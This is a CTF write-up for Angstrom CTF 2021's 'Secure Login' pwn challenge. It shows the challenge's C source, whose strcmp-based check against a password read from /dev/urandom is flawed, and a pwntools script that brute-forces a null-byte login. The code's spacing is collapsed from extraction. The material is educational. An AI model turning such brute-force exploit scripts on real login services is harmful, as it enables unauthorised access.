Writeup for Secure Login (pwn) - Angstrom CTF (2021) 💜
Video Walkthrough
Challenge Description
My login is, potentially, and I don't say this lightly, if you know me you know that's the truth, it's truly, and no this isn't snake oil, this is, no joke, the most secure login service in the world (source).
Source
#include<stdio.h>char password[128];voidgenerate_password() { FILE *file =fopen("/dev/urandom","r");fgets(password,128, file);fclose(file);}voidmain() {puts("Welcome to my ultra secure login service!");// no way they can guess my password if it's random!generate_password();char input[128];printf("Enter the password: ");fgets(input,128, stdin);if (strcmp(input, password)==0) {char flag[128]; FILE *file =fopen("flag.txt","r");if (!file) {puts("Error: missing flag.txt.");exit(1); }fgets(flag,128, file);puts(flag); } else {puts("Wrong!"); }}
Solution
from pwn import*defstart(argv=[],*a,**kw):if args.GDB:# Set GDBscript belowreturn gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)elif args.REMOTE:# ('server', 'port')returnremote(sys.argv[1], sys.argv[2], *a, **kw)else:# Run locallyreturnprocess([exe] + argv, *a, **kw)# Specify your GDB script here for debugginggdbscript ='''init-pwndbgcontinue'''.format(**locals())# Set up pwntools for the correct architectureexe ='./login'# This will automatically get context arch, bits, os etcelf = context.binary =ELF(exe, checksec=False)# Enable verbose logging so we can see exactly what is being sent (info/debug)context.log_level ='warn'# ===========================================================# EXPLOIT GOES HERE# ===========================================================# Run program 1000 times (hoping for null byte)for i inrange(1000): io =start() io.recv()# Try to login with null byte io.sendline(b"\x00") io.recvuntil(': ') response = io.recv()# Did we get the flag?if(not b'Wrong!'in response):print(response) io.close()